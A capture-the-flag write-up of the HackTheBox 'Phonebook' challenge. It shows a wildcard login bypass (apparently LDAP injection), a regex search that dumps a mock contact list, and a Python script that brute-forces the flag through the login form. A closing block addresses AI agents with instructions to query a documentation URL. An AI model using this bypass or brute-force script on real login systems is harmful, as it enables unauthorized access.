# Phonebook **Date:** 13, May, 2021 **Author:** Dhilip Sanjay S *** ## Initial Recon * Initially I couldn't find the **username** and **password** for login. So, I was looking for someother endpoint other than **login**. * I was able to find two other enpoints: * **964430b4cdd199af19b986eaf2193b21f32542d0** * **search** ### Access Denied * The `964430b4cdd199af19b986eaf2193b21f32542d0` page had a search box, which made a **POST** request to the search endpoint. But it kept on returning `Access Denied` - 403 Error message. ## Dumping all the contacts in the phonebook ### Login with wild card character (\*) * On entering the username and password as a **wildcard character (\*)**, I was able to login into the site. ### Search using regex (.\*) * Now in the search box, I tried the same wildcard character, but it didn't work. * So, I used the **regex** that matches any string `.*`, which gave me the following output: ``` Kyle Reese reese@skynet.com 555-1234567 Ellery Hun ehun1z@reddit.com 317-959-9562 Madelaine Lush mlush5@deliciousdays.com 636-918-1006 Currey Conti cconti0@auda.org.au 529-673-3935 Chaim Smoth csmothf@sbwire.com 895-974-4117 Eldin Jelf ejelf1u@google.pl 363-426-3563 Ganny Marti gmartih@diigo.com 796-793-6925 Jobey Olley jolleyx@abc.net.au 607-345-0290 Katalin Wilde kwildep@plala.or.jp 414-839-2681 Stinky Trood stroodz@foxnews.com 933-416-1003 Tab Zoren tzorenq@mit.edu 360-678-3613 Ursula Beer ubeer2f@live.com 794-396-6882 Bryan Arman barman1x@exblog.jp 640-255-8092 Babette Cunio bcunio2h@macromedia.com 709-363-0223 Berget Novis bnovis1j@constantcontact.com 780-278-2572 Ced Engley cengleyi@springer.com 230-780-1999 Caryn Germon cgermon4@wiley.com 967-789-6335 Devina Alcide dalcideu@arizona.edu 828-947-3484 Dionne Lammas dlammask@washingtonpost.com 824-561-5676 Emmalynn Burnup eburnupd@networkadvertising.org 148-856-7052 Fredericka Hanks fhanks1s@census.gov 762-337-5667 Hannah Inder hinder2a@canalblog.com 315-711-6454 Jay Sharma jsharmay@t.co 893-382-5236 Lilyan Crepel lcrepel6@ucoz.com 851-980-1038 Nevile Cogle ncogle27@answers.com 296-328-0254 Pansy Godier pgodiero@google.ca 126-853-7977 Rubetta Bernth rbernthc@biglobe.ne.jp 897-680-2856 Renelle Hyett rhyett11@google.pl 453-475-9693 Saul Haill shaill1q@omniture.com 654-478-5757 Stephanus Massot smassot2@army.mil 717-500-2025 Sarah Moyes smoyes2e@bing.com 747-445-4381 Sig Tanby stanby2c@google.es 212-473-4506 Shepherd Tunuy stunuy2d@spotify.com 293-455-5209 Teddy Bilby tbilby1r@cornell.edu 357-669-5415 Taylor Capsey tcapseyl@yahoo.co.jp 118-956-5884 Teddie Redley tredleye@java.com 658-361-4791 Abagael Guidera aguideras@barnesandnoble.com 857-685-9711 Arv Teresse ateresse3@samsung.com 916-453-1626 Bert Father bfather1v@cnet.com 131-343-2704 Bart McNess bmcness20@wordpress.com 644-208-9958 Corinne Tirone ctirone1y@nbcnews.com 572-971-8847 Denny Ashmole dashmole7@telegraph.co.uk 345-974-0984 Elenore Puttick eputtickv@newyorker.com 525-705-9780 Frederigo Itzkov fitzkov1a@amazon.com 681-753-0881 Jessamyn Trusty jtrusty2i@seesaa.net 423-494-9425 Jamison Vigurs jvigurs1b@slideshare.net 161-478-7335 Michal Fearby mfearby2k@ftc.gov 844-581-6099 Mellicent Pessolt mpessolt8@freewebs.com 735-651-5726 Terencio Ducarne tducarne9@homestead.com 831-135-9972 Trev Simmers tsimmersm@phoca.cz 378-186-4422 Aubrey Castille acastiller@homestead.com 930-681-1706 Andria Gossage agossage24@wsj.com 184-389-0446 Ansell Shovlin ashovlin16@blogspot.com 329-311-4183 Ahmed Swyndley aswyndley1@blinklist.com 954-829-5270 Bay Gregori bgregori2n@baidu.com 791-721-1297 Charlie Prangle cprangle2b@shinystat.com 869-131-2435 Dianna Chesser dchesser10@angelfire.com 901-185-5817 Denna Duplain dduplain19@springer.com 884-899-2850 Davidson Ibotson dibotson2m@dedecms.com 709-535-0126 Enid Halbord ehalbord1k@blogspot.com 318-313-2200 Eimile Pantlin epantlin1c@admin.ch 690-650-9785 Fina Bonsale fbonsale1h@meetup.com 631-592-3171 Ives Harvatt iharvatt1l@hubpages.com 606-103-7270 Jehanna Langmaid jlangmaidn@themeforest.net 171-550-7961 Karlee Christal kchristalw@sourceforge.net 354-231-8489 Koo Hansill khansill25@sourceforge.net 114-439-3748 Kimberley Mourant kmourant1d@ft.com 792-338-9852 Moll Linster mlinster17@parallels.com 704-145-7925 Sabra Brumham sbrumham12@wordpress.com 222-509-0396 Scottie Bucknell sbucknellg@dagondesign.com 765-181-5301 Stewart Currier scurrier2r@businessweek.com 480-258-4237 Sollie Windham swindham1f@squidoo.com 554-620-3103 Veda Lalonde vlalonde1o@google.com.au 788-911-3962 Aguie Baggaley abaggaley14@geocities.com 302-693-4223 April Roskelly aroskelly2q@gravatar.com 177-474-9382 Burtie Bitcheno bbitcheno29@ucla.edu 859-267-0856 Brunhilda Courtier bcourtier2o@rakuten.co.jp 610-896-4215 Baxie Ellesmere bellesmeret@furl.net 815-678-4391 Daryl Pond-Jones dpondjonesj@gmpg.org 807-353-1751 Elyse Puckring epuckring1n@dailymotion.com 619-569-7695 Glen Pickford gpickford26@amazonaws.com 101-639-7455 Issi Coupland icoupland23@myspace.com 943-625-5169 Joey Stienham jstienham28@woothemes.com 214-853-1445 Marylee Parbrook mparbrook1g@sbwire.com 872-906-8081 Reginauld Meggison rmeggison22@behance.net 460-793-0851 Sybille Jephcott sjephcott1e@yellowpages.com 454-950-9923 Siouxie Yesichev syesichev1p@mashable.com 215-132-7221 Diana Moncreiff dmoncreiff21@telegraph.co.uk 473-166-1352 Deane Shakelade dshakelade2l@reuters.com 747-399-5336 Far Chansonne fchansonne13@histats.com 215-579-4465 Ivett Danielczyk idanielczyka@vk.com 777-574-2837 Johnette Vescovini jvescovini1m@123-reg.co.uk 470-681-1859 Kary Thackeray kthackeray1i@yellowpages.com 592-635-6851 Maris Giacopelo mgiacopelo1w@networkadvertising.org 721-232-8735 Pascal Ainscough painscough18@state.gov 202-416-7489 Valeda Purselowe vpurselowe15@smugmug.com 407-245-6246 Allin de Glanville adeglanvilleb@gov.uk 885-440-5379 Marty Chellenham mchellenham2g@1und1.de 713-864-5942 Oneida Della Scala odellascala1t@tuttocitta.it 472-913-8907 Vale O' Concannon voconcannon2p@cdbaby.com 547-901-0162 Xavier Semeradova xsemeradova2j@google.es 487-363-1619 ``` * But wait, where is the flag?????? ## Finding the password/flag * We'll try to find the password. My intuition is that the password might be the flag. * We know that the **wildcard character (\*)** will let us login. So, we can try to append some character before and after the wildcard character (\*). * So let's try `*` as the username and `HTB{*}` as the password, because this the flag format for HTB challenges. * Now we are able to login. This confirms that the **password is the flag**. * So we need some script to **bruteforce** the flag. ```py #!/usr/bin/env python3 import requests import string url = "http://138.68.182.108:30733/login" leaked_pass = list("HTB{") # Remove the wildcard character printable = string.printable.replace('*', '') while True: for character in printable: print("Guessing " + ''.join(leaked_pass) + character + "*") r = requests.post(url, {"username":"*", "password": ''.join(leaked_pass) + character + "*"}) #print(r.headers['Content-Length']) if r.headers['Content-Length'] == '2586': leaked_pass.append(character) break # End of the flag if leaked_pass[-1] == '}': exit() ``` ## Solution * We get the password/flag as: `HTB{d1rectory_h4xx0r_is_k00l}` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.dhilipsanjay.in/ctfs/hackthebox/hackthebox/phonebook.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.